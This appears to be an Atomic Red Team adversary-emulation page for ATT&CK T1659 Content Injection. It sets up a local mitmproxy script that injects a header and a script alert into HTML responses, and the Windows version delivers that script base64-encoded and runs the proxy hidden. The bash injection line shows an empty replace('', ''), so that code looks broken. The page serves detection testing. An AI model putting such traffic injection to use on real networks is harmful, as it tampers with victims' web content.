# T1659 - Content Injection ## Description from ATT&CK > Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer) > > Adversaries may inject content to victim systems in various ways, including: > > * From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM) > * From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide) > > Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack) [Source](https://attack.mitre.org/techniques/T1659) ## Atomic Tests - [Atomic Test #1: MITM Proxy Injection](#atomic-test-1-mitm-proxy-injection) - [Atomic Test #2: MITM Proxy Injection (Windows)](#atomic-test-2-mitm-proxy-injection-windows) ### Atomic Test #1: MITM Proxy Injection Start mitmdump and verify injected header and HTML content. **Supported Platforms:** macOS, Linux **auto_generated_guid:** `9b360eaf-c778-4f07-a6e7-895c4f01ac1c` #### Attack Commands: Run with `bash`! ```bash curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1) curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1) ``` #### Cleanup Commands ```bash rm -rf /tmp/atomic_t1659_inject.py rm -rf /tmp/atomic_t1659.log rm -rf /tmp/curl_out.txt rm -rf /tmp/atomic_t1659_page.html pkill -f mitmdump || true ``` #### Dependencies: Run with `bash`! ##### Description: python3 must be installed ###### Check Prereq Commands ```bash command -v python3 ``` ###### Get Prereq Commands ```bash brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3 ``` ##### Description: curl must be installed ###### Check Prereq Commands ```bash command -v curl ``` ###### Get Prereq Commands ```bash brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl ``` ##### Description: pipx must be installed ###### Check Prereq Commands ```bash pipx --version ``` ###### Get Prereq Commands ```bash brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx ``` ##### Description: mitmproxy must be installed ###### Check Prereq Commands ```bash pipx list | grep mitmproxy ``` ###### Get Prereq Commands ```bash pipx install mitmproxy || brew install mitmproxy ``` ##### Description: mitmdump must be running on port 8080 ###### Check Prereq Commands ```bash lsof -i tcp:8080 | grep mitmdump ``` ###### Get Prereq Commands ```bash printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('', '')" > /tmp/atomic_t1659_inject.py ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &) sleep 5 lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1) ``` ### Atomic Test #2: MITM Proxy Injection (Windows) Start mitmdump proxy with injection script in the background. **Supported Platforms:** Windows **auto_generated_guid:** `dcc2ca85-a21c-43a4-acc7-7314d4e5891c` #### Attack Commands: Run with `powershell`! ```powershell curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt" if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 } $OutPath = "$env:TEMP\atomic_t1659_page.html" curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8 $Content = Get-Content -Path $OutPath -Raw if ($Content -notmatch "Atomic T1659 Injection") { exit 1 } ``` #### Cleanup Commands ```powershell Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue ``` #### Dependencies: Run with `powershell`! ##### Description: Python must be installed ###### Check Prereq Commands ```powershell if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ###### Get Prereq Commands ```powershell winget install --id Python.Python.3 -e ``` ##### Description: curl must be installed ###### Check Prereq Commands ```powershell if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ###### Get Prereq Commands ```powershell winget install --id cURL.cURL -e ``` ##### Description: mitmproxy must be installed and in PATH ###### Check Prereq Commands ```powershell if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ###### Get Prereq Commands ```powershell python -m pip install mitmproxy ``` ##### Description: mitmdump must be running on port 8080 ###### Check Prereq Commands ```powershell if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 } ``` ###### Get Prereq Commands ```powershell $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp' [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden Start-Sleep -Seconds 5 if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 } ```